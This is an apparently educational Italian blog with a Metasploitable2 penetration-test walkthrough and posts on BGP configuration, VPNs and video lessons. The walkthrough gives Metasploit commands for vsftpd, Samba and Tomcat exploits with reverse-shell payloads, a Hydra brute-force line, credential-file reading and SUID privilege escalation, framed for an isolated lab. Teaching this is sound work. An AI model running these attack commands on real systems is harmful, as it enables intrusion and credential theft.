mercoledì 5 novembre 2025

Penetration Test Metasploitable 2


 

AVVISO LEGALE

Metasploitable2 deve essere usato solo in ambienti di laboratorio, su reti isolate e personali. È una macchina vulnerabile per uso didattico. Usarla su reti pubbliche o di produzione è illegale.


Requisiti

  • Una macchina con Kali Linux o simile (con Metasploit Framework)

  • Metasploitable2 installata su una VM (es. VirtualBox o VMware)

  • Rete impostata in modalità host-only o NAT con accesso interno


Ricognizione (Scanning)

Scopri l’indirizzo IP della macchina target:

netdiscover -r 192.168.56.0/24

Oppure:

arp-scan --localnet

Scansione delle porte:

nmap -sS -sV -O 192.168.56.X

Analizza i servizi attivi. Metasploitable2 espone molte porte vulnerabili, tra cui:

  • FTP (21)

  • SSH (22)

  • Telnet (23)

  • HTTP (80, 8180)

  • Samba (445)

  • MySQL (3306)

  • Tomcat (8180)

  • e tanti altri


Analisi delle vulnerabilità

Puoi usare Nmap con script NSE:

nmap -sV --script=vuln 192.168.56.X

Oppure uno scanner come Nikto per HTTP:

nikto -h http://192.168.56.X

Sfruttamento (Exploitation)

Esempio: vsftpd 2.3.4 Backdoor (porta 21)

msfconsole use exploit/unix/ftp/vsftpd_234_backdoor set RHOST 192.168.56.X run

Esempio: Samba Remote Code Execution (porta 445)

use exploit/multi/samba/usermap_script set RHOST 192.168.56.X set PAYLOAD cmd/unix/reverse set LHOST <tuo IP> run

Post-Exploitation

Dopo aver ottenuto l’accesso:

  • Escalation dei privilegi

  • Raccolta di credenziali (/etc/passwd, history, shadow, etc.)

  • Accesso ad altri servizi (pivoting)


Report

Documenta ogni fase:

  • Comandi usati

  • Servizi vulnerabili trovati

  • Exploit usati

  • Accessi ottenuti



Ora vediamo un test completo!

Scopri l’indirizzo IP di Metasploitable2

netdiscover -r 192.168.56.0/24

oppure:

nmap -sn 192.168.56.0/24

Supponiamo l'IP della vittima sia 192.168.56.101.


Conferma che Samba è attivo

nmap -p 139,445 -sV 192.168.56.101

Output atteso:

PORT STATE SERVICE VERSION 445/tcp open netbios-ssn Samba smbd 3.x (workgroup: WORKGROUP)

Attacco con Metasploit

Avvia Metasploit:

msfconsole

Carica l'exploit:

use exploit/multi/samba/usermap_script

Imposta i parametri:

set RHOSTS 192.168.56.101 set PAYLOAD cmd/unix/reverse set LHOST 192.168.56.1 # ← cambia con l'IP della tua macchina Kali

Controlla che tutto sia impostato:

show options

Avvia l’exploit:

run

Shell ottenuta!

Se tutto è andato bene, vedrai una shell remota tipo questa:

[*] Command shell session 1 opened

Puoi ora eseguire comandi sulla macchina Metasploitable2, es.:

uname -a id whoami

Pulizia e report

  • Prendi nota dei comandi eseguiti

  • Salva l’output per il tuo report

  • Esci dalla sessione con exit


Vediamo come sfruttare Apache Tomcat su Metasploitable2

Verifica Tomcat attivo

nmap -p 8180 --script http-title 192.168.56.101

Oppure:
Apri il browser:
👉 http://192.168.56.101:8180

Dovresti vedere una schermata di Tomcat.


Trovare le credenziali di default

Metasploitable2 ha spesso queste credenziali predefinite per Tomcat Manager:

Username: tomcat Password: tomcat

Puoi confermarlo con:

hydra -l tomcat -P /usr/share/wordlists/rockyou.txt 192.168.56.101 http-get /manager/html

Exploit con Metasploit

Avvia Metasploit

msfconsole

Carica l’exploit:

use exploit/multi/http/tomcat_mgr_upload

Imposta i parametri:

set RHOSTS 192.168.56.101 set RPORT 8180 set HTTPUSERNAME tomcat set HTTPPASSWORD tomcat set TARGETURI /manager/html set PAYLOAD java/shell_reverse_tcp set LHOST 192.168.56.1 # ← IP della tua Kali

Controlla:

show options

Esegui l’exploit:

run

Shell ottenuta!

Se tutto funziona, otterrai una shell di tipo:

[*] Command shell session X opened

Esegui comandi per verificarlo:

whoami uname -a

Post Exploitation

Una volta dentro:

  • Esplora i file (cd, ls, cat)

  • Cerca credenziali (find / -name *.properties, cat /etc/passwd)

  • Puoi usare meterpreter se vuoi un’interfaccia più avanzata

Per eseguire un'escalation dei privilegi su Metasploitable2 dopo aver ottenuto l'accesso tramite Apache Tomcat (porta 8180), puoi sfruttare una vulnerabilità nei binaries con SUID.

Identifica i binari con SUID

Dopo aver ottenuto una shell sul sistema, cerca i file con il bit SUID impostato:

find / -perm -4000 -type f 2>/dev/null

Questi file possono essere utilizzati per ottenere privilegi elevati.


Sfrutta un binario vulnerabile

Supponiamo di trovare un binario vulnerabile come nmap con SUID impostato. Puoi tentare di eseguire un attacco di privilege escalation:

nmap --interactive

Una volta dentro l'interfaccia interattiva di nmap, prova a eseguire comandi come:

!sh

Questo comando tenta di avviare una shell con privilegi elevati.


Nota

L'efficacia di questa tecnica dipende dalla configurazione specifica del sistema e dalla presenza di binari vulnerabili. Se questa tecnica non funziona, potrebbero esserci altre vulnerabilità locali da esplorare.



martedì 4 novembre 2025

Configurazione del protocollo BGP su Cisco Packet Tracer


Ecco una configurazione di base di BGP su Cisco Packet Tracer tra due router.

Scenario:

  • Due router: R1 e R2

  • AS (Autonomous System) di R1: 65001

  • AS di R2: 65002

  • Interfacce collegate tra i router:

    • R1GigabitEthernet0/0192.168.12.1/30

    • R2GigabitEthernet0/0192.168.12.2/30


Configurazione di R1

enable configure terminal ! Configura l'interfaccia interface GigabitEthernet0/0 ip address 192.168.12.1 255.255.255.252 no shutdown exit ! Configura BGP router bgp 65001 neighbor 192.168.12.2 remote-as 65002 exit

Configurazione di R2

enable configure terminal ! Configura l'interfaccia interface GigabitEthernet0/0 ip address 192.168.12.2 255.255.255.252 no shutdown exit ! Configura BGP router bgp 65002 neighbor 192.168.12.1 remote-as 65001 exit

Verifica della Configurazione

Dopo aver configurato i router, usa questi comandi per verificare il funzionamento:

  1. Verificare lo stato della sessione BGP

    show ip bgp summary
    • Se tutto è corretto, lo stato della connessione con il vicino dovrebbe essere "Established".

  2. Verificare la tabella BGP

    show ip bgp
  3. Testare la connettività tra i router

    ping 192.168.12.2

lunedì 3 novembre 2025

Cos'è una VPN?


 

 Cos’è una VPN?

VPN sta per Virtual Private Network, ovvero Rete Privata Virtuale.

In parole semplici, una VPN è un tunnel sicuro che protegge i tuoi dati mentre navighi su Internet. Immagina di inviare le tue informazioni attraverso un corridoio segreto, così che nessun altro possa vedere cosa stai facendo online.


A cosa serve una VPN?

Privacy: Nasconde il tuo indirizzo IP reale, quindi il tuo dispositivo è più difficile da tracciare.
Sicurezza: Cripta (cioè codifica) i tuoi dati, specialmente su reti pubbliche (es. Wi-Fi di bar, hotel, aeroporti).
Accesso a contenuti bloccati: Ti permette di simulare di essere in un altro paese per accedere a contenuti non disponibili nella tua zona (es. Netflix USA, siti bloccati).
Lavoro da remoto: Aziende la usano per collegare i dipendenti alla rete aziendale in modo sicuro da qualsiasi parte del mondo.


Come funziona tecnicamente (semplificato)

Quando attivi una VPN:

  1. Il tuo dispositivo si connette a un server VPN (situato in un altro paese o città).

  2. Il traffico Internet viene criptato e inviato attraverso questo server.

  3. Per il sito web che stai visitando, sembra che tu stia accedendo da quel server VPN, non dal tuo vero indirizzo IP.

[Immagina uno schema con: TU → VPN → INTERNET]


Tipi di VPN

  • VPN personali: usate da utenti privati per navigare sicuri e accedere a contenuti geo-limitati.

  • VPN aziendali: per connettere sedi o lavoratori remoti alla rete interna aziendale.

  • VPN gratuite vs. a pagamento:

    • Le gratuite possono essere lente o non molto sicure.

    • Le VPN a pagamento offrono più server, maggiore velocità, e una migliore protezione.


Esempi pratici

  • Ti connetti al Wi-Fi di un bar → Attivi la VPN → I tuoi dati sono protetti da hacker.

  • Vuoi vedere una serie TV disponibile solo negli USA → Ti colleghi a un server VPN americano → Puoi accedere come se fossi lì.


Pro e contro

Vantaggi

  • Maggiore privacy

  • Protezione su reti pubbliche

  • Accesso a contenuti globali

Svantaggi

  • Può rallentare la connessione

  • Alcuni servizi (tipo Netflix) provano a bloccare le VPN

  • Le VPN gratuite possono vendere i tuoi dati


Conclusione

Una VPN è uno strumento potente e utile per proteggere la tua privacy online, migliorare la sicurezza, e accedere a contenuti senza restrizioni geografiche. Come ogni strumento, va usata con consapevolezza, scegliendo provider affidabili.

 

Schema visuale: Come funziona una VPN

Immagina questo flusso senza VPN:

TU 🧑‍💻 → Internet 🌐 (IP visibile, dati non criptati)

E adesso con una VPN attiva:

TU 🧑‍💻 ↓ (dati criptati 🔐) SERVER VPN 🌍 (es. USA, Germania, UK) ↓ Internet 🌐 (Il sito vede l’IP del server VPN, non il tuo)

Risultato:

  • Nessuno può leggere i tuoi dati facilmente.

  • Il sito che visiti pensa che tu sia nel paese del server VPN.

  • Sei più sicuro e libero online.


Alcuni provider VPN affidabili (2025)

Top VPN (affidabili, veloci, con buone recensioni):

NomePro principaliPrezzo medio
NordVPNMolto veloce, tanti server, ottima privacy~3€/mese
ExpressVPNSuper semplice, molto sicura, ottimo supporto~6€/mese
SurfsharkEconomica, dispositivi illimitati~2€/mese
ProtonVPNOttima versione gratuita, forte su privacyGRATIS / a pagamento

Quando usarla (consigli pratici)

SituazioneVPN consigliata?
Wi-Fi pubblico in aeroporto/bar✅ Obbligatoria
Vuoi accedere a Netflix USA✅ Utile
Navigare in paesi con censura web✅ Essenziale
Scaricare torrent in sicurezza✅ Consigliata
Solo per navigazione normale da casa🤷‍♂️ Facoltativa                                     

 

Cosa serve per la massima privacy?

Quando parliamo di privacy seria, ci sono 5 caratteristiche fondamentali da tenere d’occhio:

  1. No-log policy: la VPN non deve salvare nulla della tua attività online.

  2. Sede in Paesi “amici della privacy” (fuori da USA/UK, ecc. – meglio Svizzera, Panama, ecc.).

  3. Criptazione avanzata (es. AES-256).

  4. Kill switch: blocca internet se la VPN cade, per non esporre i dati nemmeno per un secondo.

  5. DNS leak protection: evita che richieste DNS escano fuori dalla VPN.


Le migliori VPN per la privacy (2025)

1. ProtonVPN

🇨🇭 Svizzera – Paese top per la privacy
✅ No-log auditato
✅ Forte attenzione alla privacy (sviluppata dal team del CERN)
✅ Versione gratuita ottima
💶 Versione a pagamento con più funzionalità

Perfetta se vuoi sicurezza senza compromessi.


2. Mullvad

🇸🇪 Svezia – Altro paese attento alla privacy
✅ Non chiede nemmeno l’email per registrarti
✅ Pagamento anche in contanti o crypto
✅ Interfaccia essenziale ma solida
❌ Meno server rispetto a Nord/Express

Adatta a chi vuole restare completamente anonimo.


3. IVPN

🇬🇮 Gibilterra (fuori dai 14 Eyes)
✅ No-log, auditata
✅ Accetta pagamenti in contanti
✅ Interfaccia semplice
❌ Un po’ più costosa

Ottima per utenti avanzati e coscienti della propria sicurezza.


Consiglio personalizzato

Se vuoi molta privacy, ma senza complicarti la vita:

👉 ProtonVPN è la scelta giusta: è user-friendly, auditata, svizzera e offre un ottimo equilibrio tra privacy, sicurezza e semplicità.

Se invece vuoi massima paranoia mode on, tipo “nessuna email, nessuna traccia”:

👉 Mullvad è il re. Pochi fronzoli, molta sostanza.

 

Come installare e configurare ProtonVPN (Windows/macOS)

Fase 1: Creazione account

  1. Vai su https://protonvpn.com

  2. Clicca su "Get ProtonVPN"

  3. Puoi iniziare con:

    • Versione gratuita (ottima per navigare in sicurezza)

    • Oppure piano a pagamento se vuoi velocità e più paesi

  4. Inserisci una email anonima (opzionale, ma consigliato per privacy)


Fase 2: Download del client VPN

  1. Dopo la registrazione, accedi al tuo account su ProtonVPN

  2. Vai su Download

  3. Scarica la versione per il tuo sistema:

    • Windows

    • macOS

    • Linux

    • iOS/Android

  4. Installa come qualsiasi app (doppio clic → "Avanti" → "Installa")


Fase 3: Configurazione iniziale

  1. Apri l’app e accedi con le tue credenziali

  2. Nella home vedrai una mappa con i server e una lista di paesi

Consigli privacy:

  • Vai in Impostazioni ⚙️

    • ✅ Attiva Kill Switch

    • ✅ Attiva Always-on VPN

    • ✅ Attiva Secure Core (se disponibile nel tuo piano)

    • ✅ Attiva Protezione da DNS leak


Fase 4: Connessione

  1. Scegli un server (es. Svizzera, Islanda o Svezia = buoni per privacy)

  2. Clicca su Connetti

  3. Una volta connesso, vedrai:

    • Un lucchetto verde

    • Il nuovo IP

    • La posizione virtuale

Fatto! Ora tutto il traffico del tuo dispositivo è protetto da occhi indiscreti.


Installazione su smartphone (Android/iOS)

  1. Vai su App Store / Google Play

  2. Cerca “ProtonVPN”

  3. Scarica e installa

  4. Accedi con lo stesso account

  5. Tocca “Connetti” o scegli un paese

  6. Consiglio: attiva “Connessione automatica” e “Kill switch” dalle impostazioni


Verifica se funziona

  1. Vai su https://whatismyipaddress.com

  2. Controlla se l’IP è cambiato

  3. Il tuo IP dovrebbe ora mostrare la posizione del server VPN (es. Islanda)

 

giovedì 1 giugno 2023

Reverse Shell TCP Attack Metod

In questo video si vede come si tenta l'attacco per rubare utente e password.
La metodologia prevede una combinazione di attacchi misti, con Phising combinato a Social Engineering Attack.
Nel video non sarà spiegato come generare il link per l'attacco formale, ma si vedrà tutto all'interno della rete LAN locale.

Iscriviti al canale Youtube:
https://www.youtube.com/channel/UC0eL65muMFARGXQua39LdMg

Segui il mio Blog:
https://profpellegrinogiovanni.blogspot.com/

domenica 7 maggio 2023

Configurazione rete aziendale con Rip v2, DHCP on Router, VLAN, Password...

In questa rete aziendale si può vedere la configurazione del protocollo di routing dinamico Rip v.2, Vlan, DHCP sui router nei tre sottodomini, la password di accesso, crittografata, sul router.

 

 

martedì 25 aprile 2023

Privilege Escalation sulla Macchina Meta2

In questo video si può vedere un attacco alla macchina Meta2, con la modalità di approccio che porta a "Privilege Escalationa"..

Iscriviti al canale Youtube:
https://www.youtube.com/channel/UC0eL65muMFARGXQua39LdMg

Segui il mio Blog:
https://profpellegrinogiovanni.blogspot.com/

domenica 2 aprile 2023

Protocollo ICMP

In questo video vediamo il protocollo ICMP con la spiegazione del PING e del TRACEROUTE. La modalità della spiegazione non è avanzata ma base.

 

Penetration Test Metasploitable 2

  AVVISO LEGALE Metasploitable2 deve essere usato solo in ambienti di laboratorio, su reti isolate e personali. È una macchina vulnerabile...